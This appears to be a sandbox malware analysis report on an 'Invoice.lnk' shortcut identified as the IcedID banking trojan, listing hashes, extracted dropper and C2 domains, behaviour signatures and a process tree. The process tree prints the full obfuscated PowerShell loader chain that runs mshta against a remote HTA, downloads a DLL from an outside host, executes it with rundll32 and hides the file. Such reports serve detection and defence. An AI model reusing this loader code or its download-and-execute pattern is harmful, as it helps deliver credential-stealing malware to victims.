Overview

overview

10

Static

static

Invoice.lnk

windows7_x64

10

Invoice.lnk

windows10-2004_x64

10

Analysis

  • max time kernel
    90s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    06-07-2022 18:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Invoice.lnk

  • Size

    178KB

  • MD5

    c29d6fc092698aafe01ece64da57254f

  • SHA1

    523e8303f8d6853ef499b742ef5e9d7485803a88

  • SHA256

    d94a96230551df45ea50a618f4ef47ab5f2cceaa612da2acdbd05a34b3e32cae

  • SHA512

    fa37a95c3eb1256bea25cc19f84de5de77f24a38938e062a08fab2073a8cc9ca480fa58fc90103f0e298958605866b1ec192971099dcaca4966bd134ac243e50

Score
10/10
icedid1487191074bankerloadersuricatatrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://comradespoon.com/5h.hta

Extracted

Family

icedid

Campaign

1487191074

C2

vneastruzz.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

    trojanbankericedid
  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $OIdEhQrv = [convert]::FromBase64String('PjIv');$FByAlEjZ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYQh9ZHwMW');$yZlUjspn = -join($OIdEhQrv | % {[char] ($_ -bxor 0x77)});$lMhAVEem = -join ($FByAlEjZ | % { [char] ($_ -bxor 0x77)});sal UFRBSlOH $yZlUjspn;UFRBSlOH $lMhAVEem
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" http://comradespoon.com/5h.hta
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4160
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lpasD($HADYWKdP, $JQNbwy){[IO.File]::WriteAllBytes($HADYWKdP, $JQNbwy)};function UrOfCPrL($HADYWKdP){if($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65487,65495,65495))) -eq $True){Start-Process (qQtFjAStmmZUquwlKa @(rundll32.exe $HADYWKdP ,PluginInit ))}elseif($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65499,65502,65436))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $HADYWKdP}else{Start-Process $HADYWKdP}};function iaeLEXNRYglRNM($lpasD){$ssPVUzIfuhNMPpFbC=(qQtFjAStmmZUquwlKa @(65459,65492,65487,65487,65488,65497));$uAbUQLrXxwt=(Get-ChildItem $lpasD -Force);$uAbUQLrXxwt.Attributes=$uAbUQLrXxwt.Attributes -bor ([IO.FileAttributes]$ssPVUzIfuhNMPpFbC).value__};function BRrXupXAZjXJXcLwJn($fRadwPdaCcH){$ZudUcOaTTWDij = New-Object (qQtFjAStmmZUquwlKa @(65465,65488,65503,65433,65474,65488,65485,65454,65495,65492,65488,65497,65503));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JQNbwy = $ZudUcOaTTWDij.DownloadData($fRadwPdaCcH);return $JQNbwy};function qQtFjAStmmZUquwlKa($aiWdOwItl){$JGtzYUbtTnusApt=65387;$ouOlcqQbirCOt=$Null;foreach($ALFUNolW in $aiWdOwItl){$ouOlcqQbirCOt+=[char]($ALFUNolW-$JGtzYUbtTnusApt)};return $ouOlcqQbirCOt};function bdpFrZCPoqatcoUiW(){$QuseLIVGitH = $env:ProgramData + '\';$LbGea = $QuseLIVGitH + '1.dll'; if (Test-Path -Path $LbGea){UrOfCPrL $LbGea;}Else{ $oGMWxNZW = BRrXupXAZjXJXcLwJn (qQtFjAStmmZUquwlKa @(65491,65503,65503,65499,65445,65434,65434,65486,65498,65496,65501,65484,65487,65488,65502,65499,65498,65498,65497,65433,65486,65498,65496,65434,65436,65433,65487,65495,65495));lpasD $LbGea $oGMWxNZW;UrOfCPrL $LbGea;};iaeLEXNRYglRNM $LbGea;;;;;}bdpFrZCPoqatcoUiW;
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\ProgramData\1.dll PluginInit
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            PID:236

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\1.dll
    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

    Download Submit
  • C:\ProgramData\1.dll
    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    66898dbf1d1f32af63256328731f2c9e

    SHA1

    21f5828b21fae6d81e57a11e113440c95e1752de

    SHA256

    258ea4ccbc181f6b86d3a819981d9cf526950f1aa7517b12cda14b856aad8c90

    SHA512

    65ab1f1224ba418a733b6fe9aecead3c97cb92bf236ffddd77ab70361d81d3d02c24e45c7db1019724d52a0556e2248ed23f696cb49b970efce0bba1666b5e94

    Download Submit
  • memory/236-139-0x0000000000000000-mapping.dmp
    Download
  • memory/236-144-0x0000000180000000-0x0000000180009000-memory.dmp
    Filesize

    36KB

    Download
  • memory/2820-135-0x0000000000000000-mapping.dmp
    Download
  • memory/2820-138-0x00007FFB7BA50000-0x00007FFB7C511000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2820-142-0x00007FFB7BA50000-0x00007FFB7C511000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4160-132-0x0000000000000000-mapping.dmp
    Download
  • memory/4980-134-0x00007FFB7CC40000-0x00007FFB7D701000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4980-130-0x0000000000000000-mapping.dmp
    Download
  • memory/4980-131-0x0000018AF8220000-0x0000018AF8242000-memory.dmp
    Filesize

    136KB

    Download
  • memory/4980-143-0x00007FFB7CC40000-0x00007FFB7D701000-memory.dmp
    Filesize

    10.8MB

    Download